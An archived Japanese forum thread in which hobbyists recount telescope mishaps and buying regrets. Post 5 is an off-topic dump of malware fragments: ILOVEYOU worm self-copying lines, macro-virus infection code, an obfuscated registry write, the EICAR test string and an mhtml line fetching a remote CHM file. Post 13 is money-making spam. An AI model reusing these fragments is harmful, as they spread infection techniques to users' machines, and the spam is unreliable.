5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

望遠鏡失敗談

1 ::2006/03/26(日) 23:37:40 ID:JTtSipV9
何事も上達のためには失敗を避けては通れぬもの。
でも、天体望遠鏡ともなると、値段が値段だけに、
失敗を笑って過ごすわけにも・・・

ここでは、望遠鏡にまつわる失敗談を語りあうことで、
お互いの上達のための参考にしていこうと思います。
自作に関することでも、製品に関することでもかまいません。

2 :2:2006/03/26(日) 23:47:24 ID:2Ko0L1BE
外気馴らしで雨ザアザアとか、
観望会で倒されちゃったとか、
梅雨が明けたらカビだらけとか、
そーゆーのですよ、ご主人!

3 :名無しSUN:2006/03/27(月) 00:46:06 ID:Bp9GRkii
自動追尾をonのまま帰宅して、
次の日カールコードがびろびろ〜ん

4 :名無しSUN:2006/03/27(月) 00:52:26 ID:QmusCsTA
一時期、レンズにゲル状の液を垂らして、固まってからはがすと汚れが取れる、
というレンズクリーナーがあったのだが(今もあるかな?)、
BORGのアイピースに使用したら、レンズが光学プラスチックで出来ていたので、






溶けた_| ̄|○

5 :名無しSUN:2006/03/27(月) 00:55:38 ID:ym+M/kZd
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

6 :名無しSUN:2006/03/27(月) 01:00:27 ID:JKjxDCUt
目覚めたら、赤緯赤経モータ同士がガッツンコしてとまってた。漏れのGPD+SS2K

7 :名無しSUN:2006/03/27(月) 01:06:06 ID:14QfPurp
写経調整中、手がすべってドライバーが主鏡へ落下。35cmドブ、志望確認。

8 :名無しSUN:2006/03/27(月) 01:17:12 ID:80a2OfPB
MT-200突風のため飛ばされる。

9 :名無しSUN:2006/03/27(月) 01:54:13 ID:imEOx3qg
>>4
BORGのプラピースより、クリーナの方が高い罠。
プラピースなんて買い替えた方が安上がり。


10 :名無しSUN:2006/03/27(月) 02:22:05 ID:2TW8BwKG
望遠鏡のジャンク再生が趣味。いつものように完全に分解してグリスアップに再塗装、対物レンズは分解して中性洗剤とスポンジで洗浄。
新品の台所用のスポンジを使ったのだが、片面が硬質スポンジで研磨剤付の新製品であることを知らなかった・・・。
最終的に、新品同様の筒がコレクションとして残った・・・。

11 :名無しSUN:2006/03/27(月) 03:06:24 ID:RfGW6ibJ
火星人が風で倒れてファインダーが凹みました。

12 :名無しSUN:2006/03/32(土) 17:50:11 ID:IgJBWtpr
初めての望遠鏡でミードLX200を購入したが、とても初心者の手に負えるもの
ではない。まず三脚の水平出し。基準星設定。観測場所設定。電気製品
なのでバッテリが必要。今のGPS版はどうなのか知らないけれど・・・。
移動観測用としてはまず困難。せいぜい自宅で重星・惑星・月の観測のみ。
自動導入といっても、対極にある一等星を2つ基準星としてセットしないと
精度悪い。自動導入したからといって、自分自身が星の場所を知らないと
結局見れない。もう今では全然使ってません。また、電気製品なので一生
モノでもありません。そんな望遠鏡を何十万も出して買ってしまった自分
が情けない。また、望遠鏡とコンピュータが一体型なのも許せない。
どうせすぐコンピュータのグレードUPで光学は変わらない。
悪い面ばかりではないですが、LX200はあくまでベテラン用だと思いました。
初心者のみなさん、初めて買う時は注意されたし。
私はもうミード製品は絶対買わないです。

13 :名無しSUN:2006/03/32(土) 17:51:04 ID:WHa7C8Ev
実は、たったの24時間で、
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
あなたの今後のネット収益を倍増するスキルがあります。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
それを知りたい方は、他にいませんか?

アフィリエイトを使わずにホームページとEメールだけで3,000万以上稼いだ
インターネット・マーケッターの宮川さんが、

巨大な現金の山を作り出す門外不出の一生涯使えるノウハウを
下記のサイトで公開しています。

その内容をお知りになりたい方は、下記をクリックしてください。

【たったの24時間で あなたの今後のネット収益を倍増するスキルとは? 】
http://infostore.jp/dp.do?af=moneyclick&ip=successpreneur&pd=01


14 :名無しSUN:2006/06/15(木) 00:55:53 ID:ucTKIaFE
友人が缶入りのブロアーでレンズを吹いてしまったようで、
缶の中身が直接レンズにかかって、レンズが急に冷やされ破損。
EDレンズ交換、ほぼ新品と同じ値段。

15 :名無しSUN:2006/06/15(木) 01:00:25 ID:75kWVu3C
>>12
初めての望遠鏡でLX200を買ったのは、
どなたからかのお勧めがあったのでしょうか?
私はETX-90を愛用していますが、最初はこれ位が
いいと思います。ETX-90なら、電源入れなくても
ある程度は遊べますし。

16 :名無しSUN:2006/06/15(木) 01:57:29 ID:FIkbeVia
まあETX90なら、キャップ開けなくてもある程度は遊べるしな。
転がしてみるとか、風呂に浮かべてみるとか。

17 :名無しSUN:2006/06/15(木) 10:43:40 ID:1hO4qcvK
良スレあげ

18 :名無しSUN:2006/06/15(木) 11:02:25 ID:aFk1YQUa
宮厨にだまされてNB買ったこと。惑星もイマイチ、星雲星団もイマイチ。なのにBRやBJに比べ二倍でかい。何とも中途半端な一品で、すぐ売っぱらいました。今はシュミカセに双眼装置です。安いしコンパクトでよく見えます。

19 :名無しSUN:2006/06/15(木) 12:17:00 ID:N14KT9Gu
望遠鏡失敗談?

数十年前、初めての望遠鏡購入がスリービーチだったことかな?

・・・・・・、でもその俺が数十年後もこの趣味を続けているのだから最初の望遠鏡なんか何でも良い事が分かる。

20 :名無しSUN:2006/06/15(木) 15:33:33 ID:/KAtrdzK
C11鏡筒のファインダー脚を止めるネジを締め込んだら主鏡の縁を
ガリガリ押していた。脚を取り付けない状態だとネジの先が主鏡に
届いてしまう。早速切りました。


21 :名無しSUN:2006/06/15(木) 15:39:04 ID:HhljufMS
ニューポラリス赤道儀に、望遠鏡やらカメラやらをいっぱい搭載して
ガイド撮影していたら、極軸高度ネジの固定鋳物がぼっきり折れて
一気に高度0に。ガイドアイピースを必死に見ていたオレは、アイピース
が左目に当たって、しばらく左目には太陽が乱舞していた。

22 :名無しSUN:2006/08/15(火) 01:12:15 ID:Yu6mS3xx
わたらせ

23 :名無しSUN:2006/08/26(土) 22:22:26 ID:OuKa5VAK
成東商会

24 :名無しSUN:2006/08/26(土) 22:25:12 ID:OuKa5VAK
ほれ
http://ww81.tiki.ne.jp/~yumarin7/siryou3r.htm

25 :名無しSUN:2006/08/26(土) 23:15:24 ID:qZ3FTlCw
補正板についた黄砂をそのまま拭き取ってしまった。
中国許せん。

26 :名無しSUN:2006/08/26(土) 23:36:15 ID:9wMbUqWl
望遠鏡かぁ、懐かしいな。かれこれ30年前に最初の望遠鏡を手にしたな。
誕生日プレゼントに買ってもらった口径5センチのアクロマート(焦点距離
75センチF15)と、接眼鏡用レンズ数枚。これを、ボール紙を巻いて作った
レンズ枠にはめて、雨樋などに使う塩ビパイプで鏡筒を作り、木材を加工して
作った経緯台に乗せて、でも、やっぱり三脚が自作できなかった。
ああ、結局、自分が手にしたマトモな望遠鏡はこれだけだったが、これで、
木星の表面のスケッチをしたり、これにカメラをとりつけて月の写真をとったり
して、かなりいろいろなことができた。今の若い連中はぽいと簡単に望遠鏡が
買えるんだから、うらやましいよな。当時から、ビクセンとかよくわからん
けど、口径6センチ焦点距離910ミリという規格があったよな。
高橋のアポクロマート65ミリの望遠鏡を買った友達がいて、赤道義がついて
いて、うらやましかったな。オルソスコピックの接眼レンズでクリアな映像。
こっちは、やっとこさ、色消しホイヘンスで我慢していたが。

27 :名無しSUN:2006/08/27(日) 13:21:20 ID:ERJcZU9g
高橋の架台は革命的だったね、当時。羨ましかったよ。
65mmアポの鋭像には驚いたものだ。

28 :名無しSUN:2006/09/26(火) 08:24:33 ID:j7+xEu+L
天文ガイドもいいかげんな広告で稼いでいたもんだな。



29 :名無しSUN:2006/09/26(火) 22:19:29 ID:8kPhINJ9
広告ガイドだもん


30 :名無しSUN:2006/09/26(火) 23:40:16 ID:R06KMPK9
ビクセンのED102S鏡筒にキャリーハンドルを取り付けた。
なぜか数本のネジが同梱されているのに何の疑問も持たずに一本取り出しネジ締め。

それが運悪く長いネジだったので新品の鏡筒にへこみ傷が・・・

説明書位つけといてくれよOTL


31 :赤色巨根@宇治変態性器:2006/10/12(木) 10:45:52 ID:JVOpVTh3
スカイマックス最高!

32 :名無しSUN:2006/11/10(金) 18:23:32 ID:7Yx5GVl3
亀田光器の望遠鏡覗いたらマブタが切れた。

33 :名無しSUN:2006/11/21(火) 10:16:23 ID:0i10efyv
スリービーチ主鏡+ダウエル赤道儀+パノップ三脚=大失敗


34 :名無しSUN:2006/11/21(火) 11:39:36 ID:/PIvr0hk
スリービーチの2点止め三脚とS2型赤道儀にしておけばよかったのに…
もちろん、主鏡はスリービーチのスーパーミラーで決まり。

35 :名無しSUN:2006/11/23(木) 13:41:53 ID:Bv5uZJY2
オイラは「足立光学」は足立区にあるのかと思って敬遠してたよ



36 :国語は満点:2006/11/28(火) 23:01:58 ID:nou/azSc
成東はダウエルと読むのかよ読めないよなんでだよ悩み多き少年時代

37 :ds−2000:2006/11/28(火) 23:42:56 ID:48tYnWYV
安物自動導入(GO_TO)望遠鏡。初期設定がめんどうな割りに、ていねいに設定しても
目的の星がうまく入ったり、入らなかったり、入らないほうが多い。
かろうじて入っても端ではピントが悪く、ピントのよい中央に入れなおす
のが非常にやっかい。電池消耗はやい。追尾中突然星がジャンプする。
ピントをちょっと触るだけでぐらぐらゆれてピント合わしさえ極めて困難
同価格なら手動の経緯台の方がはるかに使いやすいしよくみえる。




38 :名無しSUN:2007/02/20(火) 12:04:36 ID:wUB9egat
、、、

39 :名無しSUN:2007/02/22(木) 16:03:33 ID:BKAe/SCK
10歳で買ってもらったミードの8cm屈折、月とか土星4,5回見ただけで埃かぶってる
父ちゃんごめんorz

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)